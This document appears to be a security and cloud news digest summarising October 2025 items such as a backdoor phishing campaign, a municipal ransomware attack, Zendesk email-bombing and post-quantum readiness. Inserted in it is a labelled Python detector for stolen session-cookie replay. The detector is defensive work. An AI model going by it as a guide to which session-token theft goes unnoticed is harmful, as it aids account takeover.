🚀 AWS Parallel Computing Service (PCS) now supports Slurm v25.05, enabling PCS clusters to run the latest Slurm capabilities. The release introduces enhanced multi-cluster sackd configuration so login nodes can manage multiple clusters without requiring sackd reconfiguration or restarts, allowing administrators to preconfigure user access across clusters. It also implements improved requeue behavior that automatically retries failed instance launches during capacity shortages, increasing scheduling resilience and overall cluster reliability.

read more →

Fri, October 17, 2025

CloudWatch Database Insights Adds Tag-Based Access Control

🔐 Amazon CloudWatch Database Insights now supports tag-based access control for database-level and per-query metrics powered by RDS Performance Insights. Instance tags defined on RDS and Aurora are now automatically evaluated to authorize Performance Insights metrics, enabling IAM policies to use tag-based access conditions across logical groups of databases. This reduces manual, resource-level permission management and improves governance and security consistency. The feature is available in all AWS regions where Database Insights is offered.

read more →

Fri, October 17, 2025

Microsoft fixes Windows localhost HTTP/2 connection bug

🔧 Microsoft has fixed a known issue that broke HTTP/2 connections to localhost (127.0.0.1) and caused IIS sites to fail after recent Windows security updates. Affected systems included Windows 11 and Windows Server 2025, producing errors like “ERR_CONNECTION_RESET” and “ERR_HTTP2_PROTOCOL_ERROR”. Microsoft recommends checking Windows Update and restarting; it also enabled a Known Issue Rollback (KIR) for most home and non-managed devices, while enterprise admins can deploy a KIR group policy until a permanent update ships.

read more →

Fri, October 17, 2025

Cyberattack Disrupts Hohen Neuendorf City Administration

🔒 The Hohen Neuendorf city administration reported a cyberattack detected on October 7 that forced an immediate shutdown of its IT systems and left municipal operations running in a limited capacity. Contracted cybersecurity experts found indications attackers temporarily accessed and encrypted parts of the city's data holdings, preventing immediate inspection. Authorities say it cannot yet be confirmed whether personal data were stolen and that the city will notify affected individuals under GDPR if a data outflow is verified. Preliminary investigation points to security gaps at an external IT service provider that allegedly failed to report vulnerabilities as contractually required.

read more →

Fri, October 17, 2025

AWS Systems Manager: Windows Security Update Alerts

🛡️ AWS Systems Manager Patch Manager now notifies when Windows security updates are available but not approved by a customer's patch baseline. The feature adds a new patch state, AvailableSecurityUpdate, and by default surfaces these instances as Non-Compliant, helping administrators spot missing security patches even when using long ApprovalDelay windows. Organizations can preserve existing reporting by configuring patch baseline behavior. The capability is available in all Regions and incurs no additional charges; administrators can enable it from the Patch Manager console or documentation.

read more →

Fri, October 17, 2025

Germany Is the EU's Top Target for Cyberattacks in 2025

🔒 The Microsoft Digital Defense Report 2025 finds Germany was the most targeted EU country in the first half of 2025, receiving 3.3% of global cyberattacks. Attackers are driven more by profit than espionage, with ransomware used in 52% of incidents and pure espionage accounting for 4%. The report highlights threats linked to Russia, China, North Korea and Iran and recommends MFA—which can block 99.9% of credential-based attacks.

read more →

Sat, October 18, 2025

New .NET CAPI Backdoor Targets Russian Auto and E-commerce

🔒 Seqrite Labs uncovered a new .NET implant named CAPI Backdoor linked to a phishing campaign targeting Russian automobile and e-commerce organizations. The attack leverages a ZIP archive containing a decoy Russian tax notice and a Windows LNK that loads a malicious adobe.dll via the legitimate rundll32.exe. The backdoor gathers system and browser data, takes screenshots, and communicates with a remote C2 for commands and exfiltration. Persistence is achieved through scheduled tasks and a Startup LNK.

read more →

Fri, October 17, 2025

Mandiant Academy: Practical Network Enrichment Course

🛡️ Mandiant Academy and Google Cloud introduce Protecting the Perimeter: Practical Network Enrichment, a short-form training track to sharpen network traffic analysis and CTI operationalization. The curriculum covers five core methodologies—PCAP, netflow, protocol analysis, behavioral baselining, and historical review—and demonstrates how to enrich each with CTI and analytical tradecraft. It is aimed at practitioners who need focused, time-efficient skills to improve detection and investigation.

Fri, October 17, 2025

Preparing for AI, Quantum and Other Emerging Risks

🔐 Cybersecurity must evolve to meet rapid advances in agentic AI, quantum computing, low-code platforms and proliferating IoT endpoints. The author argues organizations should move from static defenses to adaptive, platform-based security that uses automation, continuous monitoring and AI-native protection to match attackers' speed. He urges early planning for post-quantum cryptography and closer collaboration with partners so security enables — rather than hinders — innovation.

Fri, October 17, 2025

CISOs Urged to Accelerate Post-Quantum Cryptography Plans

🔐 Enterprises acknowledge that quantum computing threatens current public-key cryptography, yet progress toward post-quantum cryptography (PQC) is uneven and slow. A PwC report finds fewer than 10% prioritize PQC in budgets, only 3% have fully implemented leading measures, 29% are piloting, and 49% have not started. Financial services, government, telecom and cloud are moving faster, while manufacturing, healthcare and industrial sectors lag due to legacy systems, skills shortages, and standards uncertainty. Experts advise inventories, pilot programs, crypto agility, and investment before the 2030 deprecation deadline to avoid 'harvest now, decrypt later' risks.

Fri, October 17, 2025

Security Teams Must Deploy Anti-Infostealer Defenses Now

🔒 Infostealers are fuelling today’s ransomware wave and the resulting stealer logs are widely available on the dark web, sometimes for as little as $10. At ISACA Europe 2025, Tony Gee of 3B Data Security urged security teams to adopt targeted technical controls in addition to baseline measures like zero trust and network segmentation. He recommended six practical defenses — including regular password rotation, FIDO2-enabled MFA, forced authentication, shorter session tokens, cookie replay detection and impossible-travel monitoring — to reduce the usefulness of stolen credentials and session data.
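
Two of the controls above, cookie replay detection and impossible-travel monitoring, can be combined into one check: flag any session cookie whose consecutive uses would require faster-than-airline travel. The following is an added example and not code from the talk or from 3B Data Security; the log format, the 900 km/h threshold, the 50 km minimum hop and the login records are all constructed for illustration.

```python
from collections import namedtuple
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sample login events (not real data): cookie s1 is used from
# Amsterdam and 30 minutes later from Sao Paulo; s2 is a plausible
# Amsterdam -> Milan trip two hours apart.
LOG_LINES = """\
2025-10-17T09:00:00Z user=alice sess=s1 ip=203.0.113.5 geo=52.37,4.90
2025-10-17T09:30:00Z user=alice sess=s1 ip=198.51.100.7 geo=-23.55,-46.63
2025-10-17T09:00:00Z user=bob sess=s2 ip=203.0.113.9 geo=52.37,4.90
2025-10-17T11:00:00Z user=bob sess=s2 ip=192.0.2.44 geo=45.46,9.19
"""

MAX_SPEED_KMH = 900.0   # assumed ceiling for airline travel
MIN_DISTANCE_KM = 50.0  # ignore hops inside one metro area / NAT churn
Event = namedtuple("Event", "ts user session ip lat lon")

def parse_line(line: str) -> Event:
    """Parse one 'ts key=value ...' record into an Event."""
    ts, *pairs = line.split()
    f = dict(p.split("=", 1) for p in pairs)
    lat, lon = (float(x) for x in f["geo"].split(","))
    return Event(datetime.fromisoformat(ts.replace("Z", "+00:00")),
                 f["user"], f["sess"], f["ip"], lat, lon)

def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance in km between two latitude/longitude points."""
    p1, p2 = radians(lat1), radians(lat2)
    dp, dl = p2 - p1, radians(lon2 - lon1)
    a = sin(dp / 2) ** 2 + cos(p1) * cos(p2) * sin(dl / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))

def find_impossible_travel(lines):
    """Return (session, user, prev_ip, new_ip, speed_kmh) for every session
    cookie whose consecutive uses imply travel faster than MAX_SPEED_KMH."""
    by_session = {}
    for ev in sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts):
        by_session.setdefault(ev.session, []).append(ev)
    alerts = []
    for sid, evs in by_session.items():
        for prev, cur in zip(evs, evs[1:]):
            dist = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            if dist < MIN_DISTANCE_KM:
                continue  # too close to distinguish replay from NAT churn
            hours = (cur.ts - prev.ts).total_seconds() / 3600
            speed = dist / hours if hours > 0 else float("inf")
            if speed > MAX_SPEED_KMH:
                alerts.append((sid, cur.user, prev.ip, cur.ip, round(speed)))
    return alerts
```

Keying on the session cookie rather than the user is what turns a generic impossible-travel rule into a replay check: a stolen cookie used from a second location trips it even when the legitimate user never logged in again.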

Sun, October 19, 2025

Experian Netherlands Fined €2.7M for Unlawful Data Use

🔍 Experian Netherlands was fined EUR 2.7 million by the Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) for collecting and using personal data from multiple public and private sources without properly informing individuals or obtaining consent. The AP found the company aggregated information from the Chamber of Commerce and from telecom and energy firms to produce credit assessments that affected interest rates and upfront deposits. Experian acknowledged the violations, will not appeal, has ceased operations in the Netherlands, and pledged to delete its database of personal data before year-end.

Fri, October 17, 2025

Identity Security: Your First and Last Line of Defense

⚠️ Enterprises now face a reality where autonomous AI agents run with system privileges, executing code and accessing sensitive data without human oversight. Fewer than 4 in 10 AI agents are governed by identity security policies, creating serious visibility and control gaps. Mature identity programs that use AI-driven identity controls and real-time data sync deliver stronger ROI, reduced risk, and operational efficiency. CISOs must move IAM from compliance checkbox to strategic enabler.

Fri, October 17, 2025

Microsoft Removes Additional Safeguard Holds for Windows 11

✅ Microsoft removed two safeguard holds blocking Windows 11 24H2 installs. The April hold affecting systems using SenseShield's sprotect.sys driver—which could trigger BSODs—was lifted after a security.sys driver update; the feature update will be offered within 48 hours. The September 2024 hold for wallpaper customization apps that caused display and virtual-desktop issues was removed on October 15, 2025; affected devices may see a warning and must confirm before upgrading. Microsoft advises updating or uninstalling problematic apps or contacting their developers for support.

Fri, October 17, 2025

Generative AI and Agentic Threats in Phishing Defense

🔒 Generative AI and agentic systems are transforming phishing and smishing into precise, multilingual, and adaptive threats. What were once rudimentary scams now leverage large language models, voice cloning, and autonomous agents to craft personalized attacks at scale. For CISOs and security teams this represents a strategic inflection point that demands updated detection, user education, and cross-functional incident response.

Fri, October 17, 2025

Email-bombing Abuse Exploits Lax Zendesk Authentication

📧 Cybercriminals abused a lack of authentication in the customer-service platform Zendesk to trigger mass ticket-creation notifications that appeared to come from hundreds of legitimate customer domains. KrebsOnSecurity received thousands of messages in rapid succession from brands including The Washington Post, Discord, NordVPN and more, with subjects ranging from alleged law-enforcement warnings to insults. Because some customers allow anonymous ticket creation and enable auto-responder triggers, replies and notifications were sent from those customers' domains, amplifying brand and inbox impact. Zendesk says it is investigating and recommends customers require verified ticket submission.

Sat, October 18, 2025

OpenAI Confirms GPT-6 Not Shipping in 2025; GPT-5 May Evolve

🤖 OpenAI says GPT-6 will not ship in 2025 but continues to iterate on its existing models. The company currently defaults to GPT-5 Auto, which dynamically routes queries between more deliberative reasoning models and the faster GPT-5-instant variant. OpenAI has issued multiple updates to GPT-5 since launch. After viral analyst claims that GPT-6 would arrive by year-end, a pseudonymous OpenAI employee and company representatives denied those reports, leaving room for interim updates such as a potential GPT-5.5.

Fri, October 17, 2025

Three Dutch Teens Linked to Russian-Associated Hackers

🧑‍💻 Three 17-year-olds in the Netherlands are suspected of providing services to a foreign power after one was found communicating with an unnamed Russian-government-affiliated hacking group. Prosecutors say the linked suspect directed the others to repeatedly map Wi‑Fi networks in The Hague and then sold the collected data to the client's contact for a fee. The investigation, opened after a report from the Military Intelligence and Security Service, led to two arrests on 22 September and seizure of devices from a third minor. An updated Criminal Code effective 15 May 2025 now criminalizes digital espionage, carrying up to eight years' imprisonment (or up to 12 years in the most serious cases).

Fri, October 17, 2025

Fortinet Advances Global Cyber Resilience at AMC25

🔒 Fortinet participated in the World Economic Forum’s Annual Meeting on Cybersecurity (AMC25) in Dubai, engaging government, industry, and civil leaders to advance global cyber resilience. Fortinet executives Dr. Carl Windsor and Derek Manky led sessions on public‑private collaboration, frameworks for scaling disruption, and the role of the Cybercrime Atlas in enabling coordinated action. They highlighted recent coordinated operations and impact reported in the 2025 Cybercrime Atlas: Impact Report, emphasizing that aligning policy, governance, and technical intelligence is essential to protect supply chains, AI systems, and critical infrastructure.

Fri, October 17, 2025

Hidden SEO Links: Business Risks and How to Protect

🔍 Hidden blocks of links embedded on corporate websites can quietly erode search rankings and damage reputation by pointing to dubious domains such as pornography or gambling. Invisible to users but parsed by search engines and security tools, these links divert link equity and often trigger algorithmic penalties. Attackers inject them via compromised admin credentials, vulnerable CMS components, infected templates, or breached hosting. Regular updates, strict access controls, routine audits, backups, and mandatory 2FA help prevent and limit impact.

Fri, October 17, 2025

VMware Certification and VMUG Advantage: Career Power Move

🔑 VMware certification is presented as a repeatable framework for mastering complex infrastructure and advancing careers, and VMUG Advantage is offered as an accelerator for that journey. The piece, authored by VMUG leadership, highlights survey data from Pearson VUE showing certification-driven promotions and confidence gains. It outlines tangible member benefits—discounts on training and exams, personal-use licenses, on-demand labs, and global community mentorship—and positions certification as a strategic investment for individuals and teams seeking secure, scalable IT practices.